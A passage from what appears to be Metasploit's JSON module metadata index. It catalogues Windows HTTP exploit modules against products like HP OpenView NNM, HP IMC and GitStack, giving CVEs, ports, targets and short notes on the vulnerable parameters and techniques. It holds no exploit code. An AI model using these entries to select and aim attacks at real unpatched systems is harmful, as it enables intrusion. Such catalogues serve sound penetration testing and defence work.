"Ericom AccessNow Server 2.4.0.2 / Windows [XP SP3 / 2003 SP2]"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/http/ericom_access_now_bof.rb",
"is_install_path": true,
"ref_name": "windows/http/ericom_access_now_bof",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/ezserver_http": {
"name": "EZHomeTech EzServer Stack Buffer Overflow Vulnerability",
"full_name": "exploit/windows/http/ezserver_http",
"rank": 600,
"disclosure_date": "2012-06-18",
"type": "exploit",
"author": [
"modpr0be <modpr0be@spentera.com>"
],
"description": "This module exploits a stack buffer overflow in the EZHomeTech EZServer\n for versions 6.4.017 and earlier. If a malicious user sends packets\n containing an overly long string, it may be possible to execute a\n payload remotely. Due to size constraints, this module uses the\n Egghunter technique.",
"references": [
"OSVDB-83065",
"BID-54056",
"EDB-19266",
"URL-http://www.spentera.com/2012/06/ezhometech-ezserver-6-4-017-stack-overflow-vulnerability/"
],
"platform": "Windows",
"arch": "",
"rport": 8000,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"EzHomeTech EzServer <= 6.4.017 (Windows XP Universal)"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/http/ezserver_http.rb",
"is_install_path": true,
"ref_name": "windows/http/ezserver_http",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/fdm_auth_header": {
"name": "Free Download Manager Remote Control Server Buffer Overflow",
"full_name": "exploit/windows/http/fdm_auth_header",
"rank": 500,
"disclosure_date": "2009-02-02",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in Free Download Manager\n Remote Control 2.5 Build 758. When sending a specially crafted\n Authorization header, an attacker may be able to execute arbitrary code.",
"references": [
"CVE-2009-0183",
"OSVDB-51745"
],
"platform": "Windows",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Free Download Manager 2.5 Build 758"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/http/fdm_auth_header.rb",
"is_install_path": true,
"ref_name": "windows/http/fdm_auth_header",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/generic_http_dll_injection": {
"name": "Generic Web Application DLL Injection",
"full_name": "exploit/windows/http/generic_http_dll_injection",
"rank": 0,
"disclosure_date": "2015-03-04",
"type": "exploit",
"author": [
"Matthew Hall <hallm@sec-1.com>"
],
"description": "This is a general-purpose module for exploiting conditions where a HTTP request\n triggers a DLL load from an specified SMB share. This module serves payloads as\n DLLs over an SMB service and allows an arbitrary HTTP URL to be called that would\n trigger the load of the DLL.",
"references": [
"CWE-427"
],
"platform": "Windows",
"arch": "x86, x64",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Windows x86",
"Windows x64"
],
"mod_time": "2019-01-29 11:08:14 +0000",
"path": "/modules/exploits/windows/http/generic_http_dll_injection.rb",
"is_install_path": true,
"ref_name": "windows/http/generic_http_dll_injection",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/geutebrueck_gcore_x64_rce_bo": {
"name": "Geutebrueck GCore - GCoreServer.exe Buffer Overflow RCE",
"full_name": "exploit/windows/http/geutebrueck_gcore_x64_rce_bo",
"rank": 300,
"disclosure_date": "2017-01-24",
"type": "exploit",
"author": [
"Luca Cappiello",
"Maurice Popp"
],
"description": "This module exploits a stack Buffer Overflow in the GCore server (GCoreServer.exe).\n The vulnerable webserver is running on Port 13003 and Port 13004, does not require\n authentication and affects all versions from 2003 till July 2016 (Version 1.4.YYYYY).",
"references": [
"EDB-41153",
"CVE-2017-11517",
"URL-www.geutebrueck.com"
],
"platform": "Windows",
"arch": "",
"rport": 13003,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic Targeting",
"GCore 1.3.8.42, Windows x64 (Win7+)",
"GCore 1.4.2.37, Windows x64 (Win7+)"
],
"mod_time": "2017-11-08 20:21:40 +0000",
"path": "/modules/exploits/windows/http/geutebrueck_gcore_x64_rce_bo.rb",
"is_install_path": true,
"ref_name": "windows/http/geutebrueck_gcore_x64_rce_bo",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/gitstack_rce": {
"name": "GitStack Unsanitized Argument RCE",
"full_name": "exploit/windows/http/gitstack_rce",
"rank": 500,
"disclosure_date": "2018-01-15",
"type": "exploit",
"author": [
"Kacper Szurek",
"Jacob Robles"
],
"description": "This module exploits a remote code execution vulnerability that\n exists in GitStack through v2.3.10, caused by an unsanitized argument\n being passed to an exec function call. This module has been tested\n on GitStack v2.3.10.",
"references": [
"CVE-2018-5955",
"EDB-43777",
"EDB-44044",
"URL-https://security.szurek.pl/gitstack-2310-unauthenticated-rce.html"
],
"platform": "Windows",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2018-03-09 07:31:55 +0000",
"path": "/modules/exploits/windows/http/gitstack_rce.rb",
"is_install_path": true,
"ref_name": "windows/http/gitstack_rce",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/hp_autopass_license_traversal": {
"name": "HP AutoPass License Server File Upload",
"full_name": "exploit/windows/http/hp_autopass_license_traversal",
"rank": 500,
"disclosure_date": "2014-01-10",
"type": "exploit",
"author": [
"rgod <rgod@autistici.org>",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a code execution flaw in HP AutoPass License Server. It abuses two\n weaknesses in order to get its objective. First, the AutoPass application doesn't enforce\n authentication in the CommunicationServlet component. Second, it's possible to abuse a\n directory traversal when uploading files thorough the same component, allowing to upload\n an arbitrary payload embedded in a JSP. The module has been tested successfully on\n HP AutoPass License Server 8.01 as installed with HP Service Virtualization 3.50.",
"references": [
"CVE-2013-6221",
"ZDI-14-195",
"BID-67989",
"URL-https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c04333125"
],
"platform": "Java",
"arch": "java",
"rport": 5814,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Windows 2003 SP2 / HP AutoPass License Server 8.01 / HP Service Virtualization 3.50",
"Windows 2008 32 bits/ HP AutoPass License Server 8.01 / HP Service Virtualization 3.50",
"Windows 2008 64 bits/ HP AutoPass License Server 8.01 / HP Service Virtualization 3.50",
"Windows 2012 / HP AutoPass License Server 8.01 / HP Service Virtualization 3.50"
],
"mod_time": "2017-09-13 22:03:34 +0000",
"path": "/modules/exploits/windows/http/hp_autopass_license_traversal.rb",
"is_install_path": true,
"ref_name": "windows/http/hp_autopass_license_traversal",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/hp_imc_bims_upload": {
"name": "HP Intelligent Management Center BIMS UploadServlet Directory Traversal",
"full_name": "exploit/windows/http/hp_imc_bims_upload",
"rank": 600,
"disclosure_date": "2013-10-08",
"type": "exploit",
"author": [
"rgod <rgod@autistici.org>",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a directory traversal vulnerability on the version 5.2 of the BIMS\n component from the HP Intelligent Management Center. The vulnerability exists in the\n UploadServlet, allowing the user to download and upload arbitrary files. This module has\n been tested successfully on HP Intelligent Management Center with BIMS 5.2 E0401 on Windows\n 2003 SP2.",
"references": [
"CVE-2013-4822",
"OSVDB-98247",
"BID-62895",
"ZDI-13-238",
"URL-https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c03943425"
],
"platform": "Windows",
"arch": "java",
"rport": 8080,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"HP Intelligent Management Center 5.1 E0202 - 5.2 E0401 / BIMS 5.1 E0201 - 5.2 E0401 / Windows"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/http/hp_imc_bims_upload.rb",
"is_install_path": true,
"ref_name": "windows/http/hp_imc_bims_upload",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/hp_imc_java_deserialize": {
"name": "HP Intelligent Management Java Deserialization RCE",
"full_name": "exploit/windows/http/hp_imc_java_deserialize",
"rank": 600,
"disclosure_date": "2017-10-03",
"type": "exploit",
"author": [
"Steven Seeley (mr_me) of Offensive Security",
"Carsten <Carsten @MaartmannMoe / cmm@transcendentgroup.com>"
],
"description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of\n Hewlett Packard Enterprise Intelligent Management Center. Authentication is not required to exploit\n this vulnerability.\n\n The specific flaw exists within the WebDMDebugServlet, which listens on TCP ports 8080 and 8443 by\n default. The issue results from the lack of proper validation of user-supplied data, which can result\n in deserialization of untrusted data. An attacker can leverage this vulnerability to execute arbitrary\n code in the context of SYSTEM.",
"references": [
"CVE-2017-12557",
"URL-https://github.com/pimps/ysoserial-modified/blob/master/src/main/java/ysoserial/payloads/JSON1.java",
"URL-https://www.zerodayinitiative.com/advisories/ZDI-17-832/"
],
"platform": "Windows",
"arch": "",
"rport": "8080",
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"HPE IMC 7.3 E0504P2 and earlier / Windows"
],
"mod_time": "2018-12-18 15:17:51 +0000",
"path": "/modules/exploits/windows/http/hp_imc_java_deserialize.rb",
"is_install_path": true,
"ref_name": "windows/http/hp_imc_java_deserialize",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/hp_imc_mibfileupload": {
"name": "HP Intelligent Management Center Arbitrary File Upload",
"full_name": "exploit/windows/http/hp_imc_mibfileupload",
"rank": 500,
"disclosure_date": "2013-03-07",
"type": "exploit",
"author": [
"rgod <rgod@autistici.org>",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a code execution flaw in HP Intelligent Management Center.\n The vulnerability exists in the mibFileUpload which is accepting unauthenticated\n file uploads and handling zip contents in an insecure way. Combining both weaknesses\n a remote attacker can accomplish arbitrary file upload. This module has been tested\n successfully on HP Intelligent Management Center 5.1 E0202 over Windows 2003 SP2.",
"references": [
"CVE-2012-5201",
"OSVDB-91026",
"BID-58385",
"ZDI-13-050",
"URL-https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c03689276"
],
"platform": "Windows",
"arch": "java",
"rport": 8080,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"HP Intelligent Management Center 5.1 E0202 / Windows"
],
"mod_time": "2017-09-13 22:03:34 +0000",
"path": "/modules/exploits/windows/http/hp_imc_mibfileupload.rb",
"is_install_path": true,
"ref_name": "windows/http/hp_imc_mibfileupload",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/hp_loadrunner_copyfiletoserver": {
"name": "HP LoadRunner EmulationAdmin Web Service Directory Traversal",
"full_name": "exploit/windows/http/hp_loadrunner_copyfiletoserver",
"rank": 600,
"disclosure_date": "2013-10-30",
"type": "exploit",
"author": [
"rgod <rgod@autistici.org>",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a directory traversal vulnerability in version 11.52 of HP\n LoadRunner. The vulnerability exists in the EmulationAdmin web service, specifically\n in the copyFileToServer method, allowing the upload of arbitrary files. This module has\n been tested successfully on HP LoadRunner 11.52 on Windows 2003 SP2.",
"references": [
"CVE-2013-4837",
"OSVDB-99231",
"BID-63475",
"ZDI-13-259",
"URL-https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c03969437"
],
"platform": "Windows",
"arch": "java",
"rport": 8080,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"HP LoadRunner 11.52"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/http/hp_loadrunner_copyfiletoserver.rb",
"is_install_path": true,
"ref_name": "windows/http/hp_loadrunner_copyfiletoserver",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/hp_mpa_job_acct": {
"name": "HP Managed Printing Administration jobAcct Remote Command Execution",
"full_name": "exploit/windows/http/hp_mpa_job_acct",
"rank": 600,
"disclosure_date": "2011-12-21",
"type": "exploit",
"author": [
"Andrea Micalizzi",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits an arbitrary file upload vulnerability on HP Managed Printing\n Administration 2.6.3 and prior versions. The vulnerability exists in the UploadFiles()\n function from the MPAUploader.Uploader.1 control, loaded and used by the server.\n The function can be abused via directory traversal and null byte injection in order\n to achieve arbitrary file upload. In order to exploit successfully, a few conditions\n must be met. First, a writable location under the context of Internet Guest Account\n (IUSR_*) or Everyone is required. By default, this module will attempt to write to\n /hpmpa/userfiles/, but the WRITEWEBFOLDER option can be used to provide\n another writable path. Second, the writable path must also be readable by a browser,\n so this typically means a location under wwwroot. Finally, you cannot overwrite\n a file with the same name as the payload.",
"references": [
"CVE-2011-4166",
"OSVDB-78015",
"BID-51174",
"ZDI-11-352",
"URL-https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c03128469"
],
"platform": "Windows",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"HP Managed Printing Administration 2.6.3 / Microsoft Windows [XP SP3 | Server 2003 SP2]"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/http/hp_mpa_job_acct.rb",
"is_install_path": true,
"ref_name": "windows/http/hp_mpa_job_acct",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/hp_nnm_getnnmdata_hostname": {
"name": "HP OpenView Network Node Manager getnnmdata.exe (Hostname) CGI Buffer Overflow",
"full_name": "exploit/windows/http/hp_nnm_getnnmdata_hostname",
"rank": 500,
"disclosure_date": "2010-05-11",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a buffer overflow in HP OpenView Network Node Manager 7.50/7.53.\n By sending specially crafted Hostname parameter to the getnnmdata.exe CGI,\n an attacker may be able to execute arbitrary code.",
"references": [
"CVE-2010-1555",
"OSVDB-64976"
],
"platform": "Windows",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"HP OpenView Network Node Manager 7.50",
"HP OpenView Network Node Manager 7.53"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/http/hp_nnm_getnnmdata_hostname.rb",
"is_install_path": true,
"ref_name": "windows/http/hp_nnm_getnnmdata_hostname",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/hp_nnm_getnnmdata_icount": {
"name": "HP OpenView Network Node Manager getnnmdata.exe (ICount) CGI Buffer Overflow",
"full_name": "exploit/windows/http/hp_nnm_getnnmdata_icount",
"rank": 500,
"disclosure_date": "2010-05-11",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a buffer overflow in HP OpenView Network Node Manager 7.50/7.53.\n By sending specially crafted ICount parameter to the getnnmdata.exe CGI,\n an attacker may be able to execute arbitrary code.",
"references": [
"CVE-2010-1554",
"OSVDB-64976"
],
"platform": "Windows",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"HP OpenView Network Node Manager 7.50",
"HP OpenView Network Node Manager 7.53"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/http/hp_nnm_getnnmdata_icount.rb",
"is_install_path": true,
"ref_name": "windows/http/hp_nnm_getnnmdata_icount",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/hp_nnm_getnnmdata_maxage": {
"name": "HP OpenView Network Node Manager getnnmdata.exe (MaxAge) CGI Buffer Overflow",
"full_name": "exploit/windows/http/hp_nnm_getnnmdata_maxage",
"rank": 500,
"disclosure_date": "2010-05-11",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a buffer overflow in HP OpenView Network Node Manager 7.50/7.53.\n By sending specially crafted MaxAge parameter to the getnnmdata.exe CGI,\n an attacker may be able to execute arbitrary code.",
"references": [
"CVE-2010-1553",
"OSVDB-64976"
],
"platform": "Windows",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"HP OpenView Network Node Manager 7.50",
"HP OpenView Network Node Manager 7.53"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/http/hp_nnm_getnnmdata_maxage.rb",
"is_install_path": true,
"ref_name": "windows/http/hp_nnm_getnnmdata_maxage",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/hp_nnm_nnmrptconfig_nameparams": {
"name": "HP OpenView NNM nnmRptConfig nameParams Buffer Overflow",
"full_name": "exploit/windows/http/hp_nnm_nnmrptconfig_nameparams",
"rank": 300,
"disclosure_date": "2011-01-10",
"type": "exploit",
"author": [
"sinn3r <sinn3r@metasploit.com>",
"MC <mc@metasploit.com>"
],
"description": "This module exploits a vulnerability in HP NNM's nnmRptConfig.exe.\n A remote user can send a long string data to the nameParams parameter via\n a POST request, which causes an overflow on the stack when function\n ov.sprintf_new() is used, and gain arbitrary code execution.'",
"references": [
"CVE-2011-0266",
"OSVDB-70473",
"ZDI-11-008"
],
"platform": "Windows",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic",
"HP NNM 7.53 Windows Server 2003 Enterprise",
"HP OpenView Network Node Manager 7.50"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/http/hp_nnm_nnmrptconfig_nameparams.rb",
"is_install_path": true,
"ref_name": "windows/http/hp_nnm_nnmrptconfig_nameparams",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/hp_nnm_nnmrptconfig_schdparams": {
"name": "HP OpenView NNM nnmRptConfig.exe schdParams Buffer Overflow",
"full_name": "exploit/windows/http/hp_nnm_nnmrptconfig_schdparams",
"rank": 300,
"disclosure_date": "2011-01-10",
"type": "exploit",
"author": [
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits NNM's nnmRptConfig.exe. Similar to other NNM CGI bugs,\n the overflow occurs during a ov.sprintf_new() call, which allows an attacker to\n overwrite data on the stack, and gain arbitrary code execution.",
"references": [
"CVE-2011-0267",
"OSVDB-70473",
"ZDI-11-009"
],
"platform": "Windows",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"NNM 7.53 - Windows Server 2003 Ent"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/http/hp_nnm_nnmrptconfig_schdparams.rb",
"is_install_path": true,
"ref_name": "windows/http/hp_nnm_nnmrptconfig_schdparams",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/hp_nnm_openview5": {
"name": "HP OpenView Network Node Manager OpenView5.exe CGI Buffer Overflow",
"full_name": "exploit/windows/http/hp_nnm_openview5",
"rank": 500,
"disclosure_date": "2007-12-06",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.50.\n By sending a specially crafted CGI request, an attacker may be able to execute\n arbitrary code.",
"references": [
"CVE-2007-6204",
"OSVDB-39530",
"BID-26741"
],
"platform": "Windows",
"arch": "",
"rport": 80,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"HP OpenView Network Node Manager 7.50 / Windows 2000 All"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/http/hp_nnm_openview5.rb",
"is_install_path": true,
"ref_name": "windows/http/hp_nnm_openview5",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/hp_nnm_ovalarm_lang": {
"name": "HP OpenView Network Node Manager ovalarm.exe CGI Buffer Overflow",
"full_name": "exploit/windows/http/hp_nnm_ovalarm_lang",
"rank": 500,
"disclosure_date": "2009-12-09",
"type": "exploit",
"author": [
"jduck <jduck@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.53.\n By sending a specially crafted CGI request to ovalarm.exe, an attacker can execute\n arbitrary code.\n\n This specific vulnerability is due to a call to \"sprintf_new\" in the \"isWide\"\n function within \"ovalarm.exe\". A stack buffer overflow occurs when processing an\n HTTP request that contains the following.\n\n 1. An \"Accept-Language\" header longer than 100 bytes\n 2. An \"OVABverbose\" URI variable set to \"on\", \"true\" or \"1\"\n\n The vulnerability is related to \"_WebSession::GetWebLocale()\".\n\n NOTE: This exploit has been tested successfully with a reverse_ord_tcp payload.",
"references": [
"CVE-2009-4179",
"OSVDB-60930",
"BID-37347",
"URL-http://dvlabs.tippingpoint.com/advisory/TPTI-09-12",
"URL-http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01950877"
],
"platform": "Windows",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"HP OpenView Network Node Manager 7.53",
"HP OpenView Network Node Manager 7.53 (Windows 2003)"
],
"mod_time": "2017-09-13 22:03:34 +0000",
"path": "/modules/exploits/windows/http/hp_nnm_ovalarm_lang.rb",
"is_install_path": true,
"ref_name": "windows/http/hp_nnm_ovalarm_lang",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/hp_nnm_ovas": {
"name": "HP OpenView NNM 7.53, 7.51 OVAS.EXE Pre-Authentication Stack Buffer Overflow",
"full_name": "exploit/windows/http/hp_nnm_ovas",
"rank": 400,
"disclosure_date": "2008-04-02",
"type": "exploit",
"author": [
"bannedit <bannedit@metasploit.com>",
"muts"
],
"description": "This module exploits a stack buffer overflow in HP OpenView Network Node Manager versions 7.53 and earlier.\n Specifically this vulnerability is caused by a failure to properly handle user supplied input within the\n HTTP request including headers and the actual URL GET request.\n\n Exploitation is tricky due to character restrictions. It was necessary to utilize a egghunter shellcode\n which was alphanumeric encoded by muts in the original exploit.\n\n If you plan on using exploit this for a remote shell, you will likely want to migrate to a different process\n as soon as possible. Any connections get reset after a short period of time. This is probably some timeout\n handling code that causes this.",
"references": [
"CVE-2008-1697",
"OSVDB-43992",
"BID-28569"
],
"platform": "Windows",
"arch": "",
"rport": 7510,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic Targeting",
"Windows 2003/zip.dll OpenView 7.53",
"Windows 2000/jvm.dll OpenView NNM 7.51"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/http/hp_nnm_ovas.rb",
"is_install_path": true,
"ref_name": "windows/http/hp_nnm_ovas",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/hp_nnm_ovbuildpath_textfile": {
"name": "HP OpenView Network Node Manager ov.dll _OVBuildPath Buffer Overflow",
"full_name": "exploit/windows/http/hp_nnm_ovbuildpath_textfile",
"rank": 300,
"disclosure_date": "2011-11-01",
"type": "exploit",
"author": [
"Anyway <Aniway.Anyway@gmail.com>",
"juan vazquez <juan.vazquez@metasploit.com>",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in HP OpenView Network Node\n Manager 7.53 prior to NNM_01213 without the SSRT100649 hotfix. By specifying a long\n 'textFile' argument when calling the 'webappmon.exe' CGI program, an attacker can\n cause a stack-based buffer overflow and execute arbitrary code.\n\n The vulnerable code is within the \"_OVBuildPath\" function within \"ov.dll\". There\n are no stack cookies, so exploitation is achieved by overwriting the saved return\n address.\n\n The vulnerability is due to the use of the function \"_OVConcatPath\" which finally\n uses \"strcat\" in an insecure way. User controlled data is concatenated to a string\n which contains the OpenView installation path.\n\n To achieve reliable exploitation a directory traversal in OpenView5.exe\n (OSVDB 44359) is being used to retrieve OpenView logs and disclose the installation\n path. If the installation path cannot be guessed the default installation path\n is used.",
"references": [
"CVE-2011-3167",
"OSVDB-76775",
"BID-50471",
"ZDI-12-002",
"URL-https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c03054052"
],
"platform": "Windows",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"HP OpenView Network Node Manager 7.53 / Windows 2000 SP4 & Windows XP SP3"
],
"mod_time": "2017-09-13 22:03:34 +0000",
"path": "/modules/exploits/windows/http/hp_nnm_ovbuildpath_textfile.rb",
"is_install_path": true,
"ref_name": "windows/http/hp_nnm_ovbuildpath_textfile",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/hp_nnm_ovwebhelp": {
"name": "HP OpenView Network Node Manager OvWebHelp.exe CGI Buffer Overflow",
"full_name": "exploit/windows/http/hp_nnm_ovwebhelp",
"rank": 500,
"disclosure_date": "2009-12-09",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.50.\n By sending a specially crafted CGI request to OvWebHelp.exe, an attacker may be able to execute\n arbitrary code.",
"references": [
"CVE-2009-4178",
"OSVDB-60929",
"BID-37340"
],
"platform": "Windows",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"HP OpenView Network Node Manager 7.50"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/http/hp_nnm_ovwebhelp.rb",
"is_install_path": true,
"ref_name": "windows/http/hp_nnm_ovwebhelp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/hp_nnm_ovwebsnmpsrv_main": {
"name": "HP OpenView Network Node Manager ovwebsnmpsrv.exe main Buffer Overflow",
"full_name": "exploit/windows/http/hp_nnm_ovwebsnmpsrv_main",
"rank": 500,
"disclosure_date": "2010-06-16",
"type": "exploit",
"author": [
"jduck <jduck@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.53\n prior to NNM_01203. By specifying a long 'arg' parameter when executing the 'jovgraph.exe'\n CGI program, an attacker can cause a stack-based buffer overflow and execute arbitrary code.\n\n This vulnerability is triggerable via either a GET or POST request. The buffer being\n written to is 1024 bytes in size. It is important to note that this vulnerability must\n be exploited by overwriting SEH. Otherwise, CVE-2010-1961 is triggered!\n\n The vulnerable code is within the \"main\" function within \"ovwebsnmpsrv.exe\" with a\n timestamp prior to April 7th, 2010. There are no stack cookies, so exploitation is\n easily achieved by overwriting SEH structures.\n\n There exists some unreliability when running this exploit. It is not completely clear why\n at this time, but may be related to OVWDB or session management. Also, on some attempts\n OV NNM may report invalid characters in the URL. It is not clear what is causing this\n either.",
"references": [
"CVE-2010-1964",
"OSVDB-65552",
"BID-40873",
"ZDI-10-108"
],
"platform": "Windows",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"HP OpenView Network Node Manager 7.53 w/NNM_01201",
"HP OpenView Network Node Manager 7.53 (Windows 2003)",
"Debug Target"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/http/hp_nnm_ovwebsnmpsrv_main.rb",
"is_install_path": true,
"ref_name": "windows/http/hp_nnm_ovwebsnmpsrv_main",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/hp_nnm_ovwebsnmpsrv_ovutil": {
"name": "HP OpenView Network Node Manager ovwebsnmpsrv.exe ovutil Buffer Overflow",
"full_name": "exploit/windows/http/hp_nnm_ovwebsnmpsrv_ovutil",
"rank": 500,
"disclosure_date": "2010-06-16",
"type": "exploit",
"author": [
"jduck <jduck@metasploit.com>"
],
